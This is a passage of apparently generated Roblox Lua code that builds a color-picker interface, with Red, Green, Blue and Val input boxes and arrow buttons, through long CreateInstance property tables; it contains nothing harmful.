CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.25098040699959,0.25098040699959,0.25098040699959),BackgroundTransparency=0,BorderColor3=Color3.new(0.37647062540054,0.37647062540054,0.37647062540054),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(1,-180,0,255),Rotation=0,Selectable=false,Size=UDim2.new(0,52,0,16),SizeConstraint=0,Visible=true,ZIndex=1,Name="Val",Parent = ColorPick3}) local ColorPick47 = CreateInstance("TextBox",{ClearTextOnFocus=true,Font=3,FontSize=5,MultiLine=false,Text="255",TextColor3=Color3.new(0.86274516582489,0.86274516582489,0.86274516582489),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=0,TextYAlignment=1,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.25098040699959,0.25098040699959,0.25098040699959),BackgroundTransparency=1,BorderColor3=Color3.new(0.37647062540054,0.37647062540054,0.37647062540054),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,2,0,0),Rotation=0,Selectable=true,Size=UDim2.new(0,50,0,16),SizeConstraint=0,Visible=true,ZIndex=1,Name="Input",Parent = ColorPick46}) local ColorPick48 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(1,-16,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,16,1,0),SizeConstraint=0,Visible=true,ZIndex=1,Name="ArrowFrame",Parent = ColorPick47}) local ColorPick49 = CreateInstance("TextButton",{Font=3,FontSize=5,Text="",TextColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=2,TextYAlignment=1,AutoButtonColor=false,Modal=false,Selected=false,Style=0,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=true,Size=UDim2.new(1,0,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Up",Parent = ColorPick48}) local ColorPick50 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.63921570777893,0.63529413938522,0.64705884456635),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,16,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Arrow",Parent = ColorPick49}) local ColorPick51 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,8,0,3),Rotation=0,Selectable=false,Size=UDim2.new(0,1,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick50}) local ColorPick52 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,7,0,4),Rotation=0,Selectable=false,Size=UDim2.new(0,3,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick50}) local ColorPick53 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,6,0,5),Rotation=0,Selectable=false,Size=UDim2.new(0,5,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick50}) local ColorPick54 = CreateInstance("TextButton",{Font=3,FontSize=5,Text="",TextColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=2,TextYAlignment=1,AutoButtonColor=false,Modal=false,Selected=false,Style=0,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,8),Rotation=0,Selectable=true,Size=UDim2.new(1,0,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Down",Parent = ColorPick48}) local ColorPick55 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.63921570777893,0.63529413938522,0.64705884456635),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,16,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Arrow",Parent = ColorPick54}) local ColorPick56 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,8,0,5),Rotation=0,Selectable=false,Size=UDim2.new(0,1,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick55}) local ColorPick57 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,7,0,4),Rotation=0,Selectable=false,Size=UDim2.new(0,3,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick55}) local ColorPick58 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,6,0,3),Rotation=0,Selectable=false,Size=UDim2.new(0,5,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick55}) local ColorPick59 = CreateInstance("TextLabel",{Font=3,FontSize=5,Text="Val:",TextColor3=Color3.new(0.86274516582489,0.86274516582489,0.86274516582489),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=1,TextYAlignment=1,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,-40,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,34,1,0),SizeConstraint=0,Visible=true,ZIndex=1,Name="Title",Parent = ColorPick46}) local ColorPick60 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.25098040699959,0.25098040699959,0.25098040699959),BackgroundTransparency=0,BorderColor3=Color3.new(0.37647062540054,0.37647062540054,0.37647062540054),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(1,-63,0,233),Rotation=0,Selectable=false,Size=UDim2.new(0,52,0,16),SizeConstraint=0,Visible=true,ZIndex=1,Name="Green",Parent = ColorPick3}) local ColorPick61 = CreateInstance("TextBox",{ClearTextOnFocus=true,Font=3,FontSize=5,MultiLine=false,Text="0",TextColor3=Color3.new(0.86274516582489,0.86274516582489,0.86274516582489),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=0,TextYAlignment=1,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.25098040699959,0.25098040699959,0.25098040699959),BackgroundTransparency=1,BorderColor3=Color3.new(0.37647062540054,0.37647062540054,0.37647062540054),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,2,0,0),Rotation=0,Selectable=true,Size=UDim2.new(0,50,0,16),SizeConstraint=0,Visible=true,ZIndex=1,Name="Input",Parent = ColorPick60}) local ColorPick62 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(1,-16,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,16,1,0),SizeConstraint=0,Visible=true,ZIndex=1,Name="ArrowFrame",Parent = ColorPick61}) local ColorPick63 = CreateInstance("TextButton",{Font=3,FontSize=5,Text="",TextColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=2,TextYAlignment=1,AutoButtonColor=false,Modal=false,Selected=false,Style=0,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=true,Size=UDim2.new(1,0,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Up",Parent = ColorPick62}) local ColorPick64 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.63921570777893,0.63529413938522,0.64705884456635),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,16,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Arrow",Parent = ColorPick63}) local ColorPick65 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,8,0,3),Rotation=0,Selectable=false,Size=UDim2.new(0,1,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick64}) local ColorPick66 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,7,0,4),Rotation=0,Selectable=false,Size=UDim2.new(0,3,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick64}) local ColorPick67 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,6,0,5),Rotation=0,Selectable=false,Size=UDim2.new(0,5,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick64}) local ColorPick68 = CreateInstance("TextButton",{Font=3,FontSize=5,Text="",TextColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=2,TextYAlignment=1,AutoButtonColor=false,Modal=false,Selected=false,Style=0,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,8),Rotation=0,Selectable=true,Size=UDim2.new(1,0,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Down",Parent = ColorPick62}) local ColorPick69 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.63921570777893,0.63529413938522,0.64705884456635),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,16,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Arrow",Parent = ColorPick68}) local ColorPick70 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,8,0,5),Rotation=0,Selectable=false,Size=UDim2.new(0,1,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick69}) local ColorPick71 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,7,0,4),Rotation=0,Selectable=false,Size=UDim2.new(0,3,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick69}) local ColorPick72 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,6,0,3),Rotation=0,Selectable=false,Size=UDim2.new(0,5,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick69}) local ColorPick73 = CreateInstance("TextLabel",{Font=3,FontSize=5,Text="Green:",TextColor3=Color3.new(0.86274516582489,0.86274516582489,0.86274516582489),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=1,TextYAlignment=1,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,-40,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,34,1,0),SizeConstraint=0,Visible=true,ZIndex=1,Name="Title",Parent = ColorPick60}) local ColorPick74 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.25098040699959,0.25098040699959,0.25098040699959),BackgroundTransparency=0,BorderColor3=Color3.new(0.37647062540054,0.37647062540054,0.37647062540054),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(1,-63,0,211),Rotation=0,Selectable=false,Size=UDim2.new(0,52,0,16),SizeConstraint=0,Visible=true,ZIndex=1,Name="Red",Parent = ColorPick3}) local ColorPick75 = CreateInstance("TextBox",{ClearTextOnFocus=true,Font=3,FontSize=5,MultiLine=false,Text="0",TextColor3=Color3.new(0.86274516582489,0.86274516582489,0.86274516582489),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=0,TextYAlignment=1,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.25098040699959,0.25098040699959,0.25098040699959),BackgroundTransparency=1,BorderColor3=Color3.new(0.37647062540054,0.37647062540054,0.37647062540054),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,2,0,0),Rotation=0,Selectable=true,Size=UDim2.new(0,50,0,16),SizeConstraint=0,Visible=true,ZIndex=1,Name="Input",Parent = ColorPick74}) local ColorPick76 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(1,-16,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,16,1,0),SizeConstraint=0,Visible=true,ZIndex=1,Name="ArrowFrame",Parent = ColorPick75}) local ColorPick77 = CreateInstance("TextButton",{Font=3,FontSize=5,Text="",TextColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=2,TextYAlignment=1,AutoButtonColor=false,Modal=false,Selected=false,Style=0,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=true,Size=UDim2.new(1,0,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Up",Parent = ColorPick76}) local ColorPick78 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.63921570777893,0.63529413938522,0.64705884456635),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,16,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Arrow",Parent = ColorPick77}) local ColorPick79 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,8,0,3),Rotation=0,Selectable=false,Size=UDim2.new(0,1,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick78}) local ColorPick80 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,7,0,4),Rotation=0,Selectable=false,Size=UDim2.new(0,3,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick78}) local ColorPick81 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,6,0,5),Rotation=0,Selectable=false,Size=UDim2.new(0,5,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick78}) local ColorPick82 = CreateInstance("TextButton",{Font=3,FontSize=5,Text="",TextColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=2,TextYAlignment=1,AutoButtonColor=false,Modal=false,Selected=false,Style=0,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,8),Rotation=0,Selectable=true,Size=UDim2.new(1,0,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Down",Parent = ColorPick76}) local ColorPick83 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.63921570777893,0.63529413938522,0.64705884456635),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,16,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Arrow",Parent = ColorPick82}) local ColorPick84 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,8,0,5),Rotation=0,Selectable=false,Size=UDim2.new(0,1,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick83}) local ColorPick85 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,7,0,4),Rotation=0,Selectable=false,Size=UDim2.new(0,3,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick83}) local ColorPick86 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,6,0,3),Rotation=0,Selectable=false,Size=UDim2.new(0,5,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick83}) local ColorPick87 = CreateInstance("TextLabel",{Font=3,FontSize=5,Text="Red:",TextColor3=Color3.new(0.86274516582489,0.86274516582489,0.86274516582489),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=1,TextYAlignment=1,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,-40,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,34,1,0),SizeConstraint=0,Visible=true,ZIndex=1,Name="Title",Parent = ColorPick74}) local ColorPick88 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.25098040699959,0.25098040699959,0.25098040699959),BackgroundTransparency=0,BorderColor3=Color3.new(0.37647062540054,0.37647062540054,0.37647062540054),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(1,-63,0,255),Rotation=0,Selectable=false,Size=UDim2.new(0,52,0,16),SizeConstraint=0,Visible=true,ZIndex=1,Name="Blue",Parent = ColorPick3}) local ColorPick89 = CreateInstance("TextBox",{ClearTextOnFocus=true,Font=3,FontSize=5,MultiLine=false,Text="0",TextColor3=Color3.new(0.86274516582489,0.86274516582489,0.86274516582489),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=0,TextYAlignment=1,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.25098040699959,0.25098040699959,0.25098040699959),BackgroundTransparency=1,BorderColor3=Color3.new(0.37647062540054,0.37647062540054,0.37647062540054),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,2,0,0),Rotation=0,Selectable=true,Size=UDim2.new(0,50,0,16),SizeConstraint=0,Visible=true,ZIndex=1,Name="Input",Parent = ColorPick88}) local ColorPick90 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(1,-16,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,16,1,0),SizeConstraint=0,Visible=true,ZIndex=1,Name="ArrowFrame",Parent = ColorPick89}) local ColorPick91 = CreateInstance("TextButton",{Font=3,FontSize=5,Text="",TextColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=2,TextYAlignment=1,AutoButtonColor=false,Modal=false,Selected=false,Style=0,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=true,Size=UDim2.new(1,0,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Up",Parent = ColorPick90}) local ColorPick92 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.63921570777893,0.63529413938522,0.64705884456635),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,16,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Arrow",Parent = ColorPick91}) local ColorPick93 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,8,0,3),Rotation=0,Selectable=false,Size=UDim2.new(0,1,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick92}) local ColorPick94 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,7,0,4),Rotation=0,Selectable=false,Size=UDim2.new(0,3,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick92}) local ColorPick95 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,6,0,5),Rotation=0,Selectable=false,Size=UDim2.new(0,5,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick92}) local ColorPick96 = 